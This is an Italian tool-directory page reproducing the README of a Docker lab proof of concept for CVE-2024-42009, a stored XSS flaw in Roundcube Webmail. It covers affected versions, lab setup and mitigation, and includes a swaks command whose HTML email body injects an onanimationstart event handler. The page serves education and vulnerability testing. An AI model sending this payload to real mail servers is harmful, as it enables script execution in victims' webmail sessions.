Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-42009 — Docker-based Proof-of-Concept per CVE-2024-42009, una vulnerabilità XSS memorizzata in Roundcube Webmail. Mostra lo sfruttamento tramite email HTML create ad hoc e include un ambiente di laboratorio vulnerabile per i test. | Kitploit
Strumenti/GitHubGitHub/zaidarif47/cve-2024-42009
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebApprendimento e FormazioneLab e Pratica
GitHubzaidarif47/cve-2024-42009

CVE-2024-42009

Docker-based Proof-of-Concept per CVE-2024-42009, una vulnerabilità XSS memorizzata in Roundcube Webmail. Mostra lo sfruttamento tramite email HTML create ad hoc e include un ambiente di laboratorio vulnerabile per i test.

Vedi Repository
14 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-42009 – XSS Memorizzato in Roundcube (PoC Docker)

📌 Panoramica

Questo repository dimostra un Proof-of-Concept (PoC) funzionante per CVE-2024-42009, una vulnerabilità di Cross-Site Scripting (XSS) memorizzata in Roundcube Webmail.

La vulnerabilità è causata da una sanitizzazione HTML impropria seguita da una rielaborazione non sicura degli attributi, consentendo agli aggressori di iniettare gestori di eventi dannosi tramite email HTML appositamente create.


⚠️ Versioni Affette

  • Roundcube ≤ 1.5.7
  • Roundcube ≤ 1.6.7

🧠 Riepilogo della Vulnerabilità

Roundcube sanifica le email HTML in arrivo ma successivamente rielabora alcuni attributi (es. bgcolor, attributi malformati), portando a:

  • Confusione nei confini degli attributi
  • Iniezione di nuovi attributi
  • Reintroduzione di gestori di eventi pericolosi (es. onanimationstart)

Ciò consente l'esecuzione di JavaScript arbitrario quando una vittima apre un'email dannosa.


🐳 Configurazione dell'Ambiente (Docker)

1. Clona il repository

root@kitploit:~
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC

2. Avvia il laboratorio vulnerabile

root@kitploit:~
docker compose up -d

⏳ Attendere circa 10-15 secondi per l'inizializzazione del server di posta.


3. Crea utenti di test

root@kitploit:~
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'

4. Accedi a Roundcube

root@kitploit:~
http://localhost:8080

Credenziali:

  • [email protected] / victim123
  • [email protected] / attacker123

💣 Sfruttamento della Vulnerabilità

Invia l'email dannosa utilizzando lo strumento swaks:

root@kitploit:~
swaks --to [email protected] \
      --from [email protected] \
      --server localhost:2525 \
      --header "Content-Type: text/html; charset=utf-8" \
      --header "Subject: CVE-2024-42009 PoC" \
      --body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'

📸 Prova di Concetto

  1. Accedi all'account vittima di Roundcube
  2. Apri la casella di posta in arrivo
  3. JavaScript viene eseguito (appare un alert)

1. Email Dannosa Consegnata

Passo 1

2. XSS Innescato

Passo 3


🛡️ Mitigazione

Aggiorna alle versioni corrette:

  • Roundcube ≥ 1.6.8
  • Roundcube ≥ 1.5.8

📚 Riferimenti

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-42009
  • Sonarsource: https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/#desanitization-in-inline-email-rendering-cve202442009

⚖️ Dichiarazione di Esclusione di Responsabilità

Questo progetto è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza autorizzata. Non utilizzarlo contro sistemi senza il permesso appropriato.


Scarica lo strumento